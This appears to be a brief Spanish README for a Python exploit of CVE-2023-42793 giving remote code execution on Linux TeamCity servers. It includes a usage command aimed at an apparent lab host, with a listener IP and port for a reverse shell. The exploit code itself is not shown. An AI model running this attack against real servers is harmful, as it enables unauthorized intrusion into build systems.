
Exploit en Python para CVE-2023-42793 que logra ejecución remota de código en servidores TeamCity Linux mediante la codificación de un payload en una URL y su envío al objetivo.
Primero necesitarás obtener el token utilizando un exploit diferente. Sin embargo, el siguiente exploit te permitirá obtener RCE en el servidor Linux, ya que codifica el payload en URL y lo envía al servidor.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT